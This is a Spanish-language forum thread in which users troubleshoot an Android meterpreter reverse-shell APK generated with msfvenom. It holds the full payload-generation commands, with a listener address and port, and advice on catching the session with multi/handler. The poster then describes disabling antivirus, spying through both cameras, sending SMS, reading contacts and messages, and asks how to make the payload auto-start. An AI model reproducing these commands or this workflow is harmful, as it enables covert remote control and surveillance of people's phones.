problema con payload en android

Iniciado por hckcrck, 26 Junio 2016, 16:02 PM

0 Miembros y 1 Visitante están viendo este tema.

hckcrck

Hola a todos, tengo un problema al instalar un payload en un teléfono android, he generado al payload con msfvenom y no se si lo he hecho de la forma correcta, dejo el comando:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.167 LPORT=53 R > ANDROID3.apk

También le he añadido:
msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST=192.168.43.167 LPORT=53 R > ANDROID3.apk

Me salen algunas cosas sin rellenar,
No Arch selected, selecting Arch: dalvik from the payload                                                                                            
No encoder or badchars specified, outputting raw payload  

pero en un tutorial que he visto le vasta con el primer comando para crear una sell remota.
Este es el proceso:
Msfvenom genera el payload con la extensión .apk, lo paso a  un soy experia tipo (reliquia :laugh:) y pongo handler en escucha, cuando voy a instalar el archivo .apk me sale el instalador, muestra los permisos, le doy a aceptar y sale como si se instalase, pero dice "la aplicación no está instalada" y sale de la instalación sin que el handler pille nada.

Que puedo estar haciendo mal? Lo mas seguro es que sea lo que me advierte el propio msfvenom, pero en el tutorial no tenían ningún problema sin esos comandos.
Para seguir la senda:

*observa al maestro,
sigue al maestro,
camina con el maestro,
ve a través del maestro,
conviértete en el maestro.

https://www.youtube.com/watch?v=08dphYPKLyE

GreenArrow77

#1
hola,
por lo que tengo entendido, tu quieres conseguir una shell remota infectando a un android con un payload que generas con msfvenom (que el comando que yo he visto esta bien, por tanto intuyo que la aplicación/payload se crea correctamente), y luego, pones a la escucha (con el comando "use multi/handler") y si has puesto bien los puertos y todo, pues te agarrará una meterpreter, pues tu lo que quieres es a  traves de la meterpreter conseguir una shell remota?
si es eso solo tienes que escirbir en la meterpreter el comando "shell", y ya esta, navegas por el android  victima con comandos linux y ya esta.

ahora bien, si ese no es es problema, entonces es con el msfvenom, cuando creas el payload?

un saludo y a ver si lo solucionamos -by secu


posdata:

el comando: "msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST=192.168.43.167 LPORT=53 R > ANDROID3.apk" pienso que esta mal, ya que añades la plataforma dos veces, la correcta sería:

"msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.... lport=4444 R> /root/Escritorio/payload.apk"
~La única lucha que se pierde es la que se abandona.- E."Che" Guevara~

hckcrck

Hola gracias por responder,
Citarel comando: "msfvenom --platform android -p android/meterpreter/reverse_tcp LHOST=192.168.43.167 LPORT=53 R > ANDROID3.apk" pienso que esta mal, ya que añades la plataforma dos veces

Jajaja me lo figuraba, pero soy bastante nuevo y al ver que no me funcionaba, decidí probar mas cosas a ver que pasaba, no he conseguido solucionar el problema, pero si se "cual" es, y eso me preocupa, veréis porque
El problema no es el payload o msfvenom, es el teléfono, busqué en google, y resulta que surge cuando en el teléfono hay otra aplicación con el mismo certificado, por ejemplo si quieres instalar una versión posterior de una app y tienes la antigua todavía instalada en el teléfono. De modo que decidí probar con otro "sujeto", y conseguí instalarla  ;-), algo que me decepcionó bastante fue que lo detectaron todos los antivirus  :rolleyes: tuve que desinstalarlos todos, después todo fue bien, conseguí una shell remota y aunque no conseguí escalar privilegios, si pude hacer algunas cosillas que me dejaron sorprendido  :D, ver por las dos camaras (lo único que cada imagen que me manda hace sonar "clic" de la cámara, muy discreto no es :xD), enviar sms, ver los contactos sus mensajes y mas  ;D
Aquí viene la parte que me preocupa, el error de "la aplicación no esta instalada" me salió en el nuevo teléfono varias veces, ya que le instalé mas de un payload, quería conseguir conectarme a el fuera de lan (conseguido  :)), pero en el primer teléfono por que sale? es la primera vez que instalo un payload en el  :o puede ser que alguien lo aya hecho antes que yo?

Aprovecharé el tema para plantear otra duda, de vez en cuando pierdo la conexión con la shell remota, y me cierra la sesión, es un fastidio tener que volver a ponerlo a la escucha cada vez que ocurre, no sería mucho problema si no fuera por que no consigo que el payload se inicie automáticamente, cada vez que quiero conectarme tengo que pulsar el icono de la app, no hay ninguna forma de hacer que el payload se inicie solo y no tener que hacerlo?

Agradezco cualquier ayuda, gracias.
Para seguir la senda:

*observa al maestro,
sigue al maestro,
camina con el maestro,
ve a través del maestro,
conviértete en el maestro.

https://www.youtube.com/watch?v=08dphYPKLyE